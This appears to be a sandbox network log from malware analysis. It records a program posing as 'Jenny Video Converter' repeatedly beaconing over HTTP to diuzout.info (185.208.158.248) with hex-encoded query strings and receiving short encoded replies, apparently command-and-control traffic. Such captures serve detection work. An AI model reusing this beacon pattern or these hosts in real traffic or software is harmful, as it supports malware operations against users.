    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 63163 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:55.582179070 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:56.276204109 CEST | 1190 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 33 64 36 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 31 63 35 34 64 62 38 65 35 35 30 65 63 35 61 37 61 35 64 65 62 32 31 36 64 39 36 33 62 36 37 38 65 66 34 31 37 63 35 66 31 39 37 39 62 32 35 63 66 36 65 39 32 30 38 64 39 35 30 38 62 32 30 62 37 35 39 62 33 65 39 35 34 32 37 65 38 36 35 64 30 66 63 36 37 62 64 38 61 66 31 64 33 34 63 65 63 33 66 63 39 31 36 33 35 35 36 35 63 32 35 66 64 32 37 37 33 31 36 36 34 62 38 65 38 39 33 66 66 38 36 32 38 35 62 65 37 35 63 37 62 32 31 66 35 32 65 35 62 65 39 66 35 65 66 39 32 66 38 33 61 37 33 62 61 65 38 34 37 39 38 38 31 66 62 37 61 32 37 31 [TRUNCATED]
                                                                              Data Ascii: 3d667b69c953804b26b565fe95b321bd19a55fc8fcff51e19ebbd55e903caff8de795874d8047d1e4dc2a30a152ffd6cd0729e97d59ad75f66ca83253defcd30bde41c87eae14fa398f26e410ad61c54db8e550ec5a7a5deb216d963b678ef417c5f1979b25cf6e9208d9508b20b759b3e95427e865d0fc67bd8af1d34cec3fc91635565c25fd27731664b8e893ff86285be75c7b21f52e5be9f5ef92f83a73bae8479881fb7a2718b56af19acbb07bd06d05363365aa5dcbddad3925b9cc10ba03b1bc37bedbca3475200bd330e01aeccfb80451d33e12da54def0699c2db79655a1e3cea9c33a3dbc78b8f30b93a8b6715aa087ff20a9f89b8316f316e1599e4d6cccbfc0fdd84a6ca59cf03da96a8f0829a921dc32de9f00cb56b7361a1a55d4d66c5925556c8ffd8e2a2c6b4712d1c0b1120dfcd0b9f7dc307a71e23f85c20e0a4795b4c6035240d463745a3b44e6d1d2c7f1cf57823d6a50ff783d9c2abec5977f8a54cb8d291e15609dfe80eb1d06b82e82dc187703dd37c7f5980a683471942b03e855587c648746deb8a3e73faad2dc115a8e33c146488abbdd64d2513bbc69eb2838b17a885103c6adaeaf6fa7c0079b4ac8dfce43b312b345ebacb76d91ab2eaa24360d29c5827c02e8a4cc5370ea2832291418df25ab4fa0019345dcbece9055f04b8a80b0c01b0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 63165 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:56.394890070 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:57.074873924 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:13:57.186307907 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:57.430228949 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 63166 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:57.550920963 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:58.256364107 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 63167 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:58.380295038 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:59.060466051 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:13:59.171472073 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:59.411493063 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 63168 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:59.552522898 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:00.235232115 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:00.342839956 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:00.578231096 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 63169 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:00.707314968 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:01.398214102 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:01.519860029 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:02.218530893 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:02.327187061 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:02.562807083 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:02.670967102 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:02.906702995 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:03.014552116 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:03.256772041 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 63171 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:03.379290104 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:04.056408882 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 63172 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:04.175849915 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:04.879509926 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 63174 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:05.004883051 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:05.705967903 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 63175 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:05.832245111 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:06.545501947 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 63176 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:06.676677942 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:07.381748915 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 63177 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:07.504508972 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:08.201971054 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 63178 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:08.332726955 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:09.014743090 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:09.124156952 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:09.364315987 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 63179 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:09.488717079 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:10.181592941 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:14:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 63180 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp: Oct 8, 2024 04:14:10.301134109 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:10.981443882 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Oct 8, 2024 04:14:11.092614889 CEST | Bytes transferred: 327 | Direction: OUT | Data:
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Oct 8, 2024 04:14:11.334624052 CEST | Bytes transferred: 220 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 63181 | Destination IP: 185.208.158.248 | Destination Port: 80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

